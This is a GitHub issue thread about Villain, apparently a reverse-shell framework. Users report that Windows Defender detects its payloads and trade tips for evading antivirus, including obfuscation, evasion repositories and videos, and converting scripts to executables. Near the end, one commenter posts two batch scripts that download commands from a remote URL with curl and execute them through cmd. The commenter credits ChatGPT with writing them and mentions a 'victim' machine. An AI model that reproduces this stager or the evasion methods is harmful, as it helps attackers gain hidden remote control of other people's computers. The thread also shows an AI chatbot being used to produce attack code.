Comments (26)

t3l3machus avatar t3l3machus commented on July 29, 2024 8

I made a small update in the payload templates and it seems to do the trick again (for now).
You should not expect this to last forever (with this or any other tool); the obfuscate function is there to assist you, not to do the job for you.

I will try to update the templates and improve the general functionality of Villain in time, but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques, both manually and by using automated tools; you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.

image

from villain.

t3l3machus avatar t3l3machus commented on July 29, 2024 5

I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs

t3l3machus avatar t3l3machus commented on July 29, 2024 4

I am intentionally leaving this open indefinitely.

edikiuspy avatar edikiuspy commented on July 29, 2024 3

Thank you for the response. Your tool is very useful, and great work!

dmcxblue avatar dmcxblue commented on July 29, 2024 3

@rikda It will eventually get detected, you need to apply your own magic to bypass.

gaalos avatar gaalos commented on July 29, 2024 1

@t3l3machus Thx for your work! Your code makes me happy to explain some risks to my students :=)

keralahacker avatar keralahacker commented on July 29, 2024

image
Using the obfuscate option, it's getting detected

anonyvietofficial avatar anonyvietofficial commented on July 29, 2024

same issue

edikiuspy avatar edikiuspy commented on July 29, 2024

@t3l3machus unfortunately, with the new Windows Defender update it's the same issue again

gaalos avatar gaalos commented on July 29, 2024

You might "cypher" the string using a key?

t3l3machus avatar t3l3machus commented on July 29, 2024

@edikiuspy thank you :))

gaalos avatar gaalos commented on July 29, 2024

@t3l3machus Nicely done on your explanation.
Maybe you can use:
image
In yours you can obfuscate it by changing variable names.
Add OR AND conditions automatically? :)
The goal here is to not touch the generated payload ;)

t3l3machus avatar t3l3machus commented on July 29, 2024

@gaalos That was the goal at the beginning. It doesn't matter how complicated I make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there); it doesn't work.

gaalos avatar gaalos commented on July 29, 2024

@t3l3machus yes, it's true ^^.
Maybe create the payload without PowerShell, as a binary file?

t3l3machus avatar t3l3machus commented on July 29, 2024

@gaalos yeah, I have already done it! I will update soon with an additional Windows cmd payload template

rikda avatar rikda commented on July 29, 2024

image

detected by AV

aksrivastava avatar aksrivastava commented on July 29, 2024

If you want to bypass Defender, please try these techniques

https://youtu.be/EZOW40S_cTM

gaalos avatar gaalos commented on July 29, 2024

@t3l3machus when did you do the update about "

> Maybe create payload without powershell as binary file ?

Hey @t3l3machus, when did you update it with the binary payload? :p

t3l3machus avatar t3l3machus commented on July 29, 2024

@gaalos haven't done such an update and don't intend to. Other things are in order for Villain (after I release a new tool, probably next Monday) :)

Envincion avatar Envincion commented on July 29, 2024

> @gaalos haven't done such an update and don't intend to. Other things are in order for Villain (after I release a new tool, probably next Monday) :)

For me it's still working like a charm, but I'm wondering if there's a way to fix the payload to be able to work on Windows 8.1; it's giving me this
image

aksrivastava avatar aksrivastava commented on July 29, 2024

Convert your PowerShell script into an EXE in 2 seconds, watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Envincion avatar Envincion commented on July 29, 2024

> convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Thank you for your reply, but unfortunately converting ps to exe doesn't help to get the reverse shell working.
It works on Windows 10 - 11 - server 2018, but not on Windows 8.1

gaalos avatar gaalos commented on July 29, 2024

> convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Not working because it's just executing the script, not a real BINARY/EXE file :)

UdayA6796 avatar UdayA6796 commented on July 29, 2024

Does someone have the older version of Villain? If yes, can you guys send the file here pls

F0rW0rk1 avatar F0rW0rk1 commented on July 29, 2024

The last version of Villain still gets detected by Windows Defender. The obfuscate function doesn't work for the netcat templates; I got this error "Ignoring unsupported arguments: OBFUSCATE", and adding the obfuscate attribute doesn't work either. Does someone know how I can make this work?

gaalos avatar gaalos commented on July 29, 2024

Hey all, I use something like curl to ... and it works.
Thx to chatGPT

run.bat
```bat
@echo off

REM Replace the URL with the one you want to call
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"

REM Perform the curl request to the URL and store the output in a variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Execute the variable's contents as a command
cmd /k %curl_output%

REM End the script
exit
```

or
```bat
@echo off

REM Replace the URL with the one you want to call
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"

REM Perform the curl request to the URL and store the output in a variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Execute the variable's contents as a command
start /B cmd /k %curl_output%

REM End the script
exit
```

@t3l3machus Maybe you can try to create a cmd/powershell payload based on a curl call?
Obviously the "victim" needs to be granted access to the external URL
